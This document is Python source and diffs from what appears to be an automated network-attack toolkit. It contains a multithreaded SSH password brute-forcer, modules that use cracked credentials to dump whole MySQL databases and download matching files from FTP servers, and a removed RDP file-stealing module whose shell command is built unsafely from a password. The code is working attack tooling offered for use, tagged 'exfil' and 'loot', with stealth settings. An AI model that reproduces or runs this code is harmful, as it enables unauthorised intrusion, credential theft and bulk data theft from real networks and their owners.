"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Démarrage de l'attaque SSH... sur le port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

View File

@@ -1,189 +1,252 @@
"""
steal_data_sql.py — SQL data looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
- DB.creds (service='sql') provides (user,password, database?).
- We connect first without DB to enumerate tables (excluding system schemas),
then connect per schema to export CSVs.
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
"""
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
import csv
from threading import Timer
from typing import List, Tuple, Dict, Optional
from sqlalchemy import create_engine, text
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
b_port = 3306
b_trigger = 'on_any:["on_cred_found:sql","on_service:sql"]'
b_requires = '{"all":[{"has_cred":"sql"},{"has_port":3306},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 60 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "1/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealDataSQL initialized.")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str, Optional[str]]]:
"""
Return list[(user,password,database)] for SQL service.
Prefer exact IP; also include by MAC if known. Dedup by (u,p,db).
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
d = row.get("database")
d = str(d).strip() if d is not None else None
key = (u, p, d or "")
if not u or (key in seen):
continue
seen.add(key)
out.append((u, p, d))
return out
# -------- SQL helpers --------
def connect_sql(self, ip: str, username: str, password: str, database: Optional[str] = None):
try:
# Si aucune base n'est spécifiée, on se connecte sans base
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
conn_str = f"mysql+pymysql://{username}:{password}@{ip}:{b_port}{db_part}"
engine = create_engine(conn_str, connect_args={"connect_timeout": 10})
# quick test
with engine.connect() as _:
pass
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
logger.info(f"Connected SQL {ip} as {username}" + (f" db={database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
logger.error(f"SQL connect error {ip} {username}" + (f" db={database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
Returns list of (table_name, schema_name) excluding system schemas.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
logger.info("Table search interrupted.")
return []
query = """
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
q = text("""
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE='BASE TABLE'
AND TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys')
""")
with engine.connect() as conn:
rows = conn.execute(q).fetchall()
return [(r[0], r[1]) for r in rows]
except Exception as e:
logger.error(f"Error finding tables: {e}")
logger.error(f"find_tables error: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
def steal_data(self, engine, table: str, schema: str, local_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
logger.info("Data steal interrupted.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
q = text(f"SELECT * FROM `{schema}`.`{table}`")
with engine.connect() as conn:
result = conn.execute(q)
headers = result.keys()
os.makedirs(local_dir, exist_ok=True)
out = os.path.join(local_dir, f"{schema}_{table}.csv")
with open(out, "w", newline="", encoding="utf-8") as f:
writer = csv.writer(f)
writer.writerow(headers)
for row in result:
writer.writerow(row)
logger.success(f"Dumped {schema}.{table} -> {out}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
logger.error(f"Dump error {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filtrer les credentials pour l'IP spécifique
ip_credentials = df[df['IP Address'] == ip]
# Créer des tuples (username, password, database)
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SQL credentials in DB for {ip}")
if not creds:
logger.error(f"No SQL credentials for {ip}. Skipping.")
return 'failed'
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def _timeout():
if not self.sql_connected:
logger.error(f"No SQL connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
def timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
timer = Timer(240, timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
success = False
for username, password, database in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# D'abord se connecter sans base pour vérifier les permissions globales
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
break
# Se connecter à la base spécifique pour le vol de données
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
for username, password, _db in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
base_engine = self.connect_sql(ip, username, password, database=None)
if not base_engine:
continue
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
tables = self.find_tables(base_engine)
if not tables:
continue
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
db_engine = self.connect_sql(ip, username, password, database=schema)
if not db_engine:
continue
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"sql/{mac}_{ip}/{schema}")
self.steal_data(db_engine, table, schema, local_dir)
logger.success(f"Stole data from {len(tables)} tables on {ip}")
success = True
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"SQL loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,198 +1,272 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
steal_files_ftp.py — FTP file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
- IP -> (MAC, hostname) via DB.hosts.
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesFTP"
# Action descriptors
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesFTP initialized")
def connect_ftp(self, ip, username, password):
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Establish an FTP connection.
Return list[(user,password)] from DB.creds for this target.
Prefer exact IP; also include by MAC if known. Dedup preserves order.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- FTP helpers --------
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
# Max recursion depth for directory traversal (avoids symlink loops)
_MAX_DEPTH = 5
def connect_ftp(self, ip: str, username: str, password: str, port: int = b_port) -> Optional[FTP]:
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.connect(ip, port, timeout=10)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
logger.info(f"Connected to {ip}:{port} via FTP as {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.info(f"FTP connect failed {ip}:{port} {username}: {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
def find_files(self, ftp: FTP, dir_path: str, depth: int = 0) -> List[str]:
files: List[str] = []
if depth > self._MAX_DEPTH:
logger.debug(f"Max recursion depth reached at {dir_path}")
return []
try:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
try:
ftp.cwd(item)
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item), depth + 1))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
# not a dir => file candidate
if any(item.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(name in item for name in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
logger.error(f"FTP path error {dir_path}: {e}")
return files
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
# Check file size before downloading
try:
size = ftp.size(remote_file)
if size is not None and size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # SIZE not supported, try download anyway
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
logger.error(f"FTP download error {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
timer = None
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '', port=port_i)
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.")
return 'failed'
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
def _timeout():
if not self.ftp_connected:
logger.error(f"No FTP connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
# Attempt anonymous access first
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
# Anonymous first
ftp = try_anonymous()
if ftp:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname}
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.success(f"Stole {len(files)} files from {ip} via anonymous")
success = True
try:
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
except Exception:
pass
if success:
return 'success'
# Authenticated creds
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying FTP {username} @ {ip}:{port_i}")
ftp = self.connect_ftp(ip, username, password, port=port_i)
if not ftp:
continue
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.info(f"Stole {len(files)} files from {ip} as {username}")
success = True
try:
ftp.quit()
except Exception:
pass
if success:
return 'success'
except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}")
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")
finally:
if timer:
timer.cancel()

View File

@@ -1,184 +0,0 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
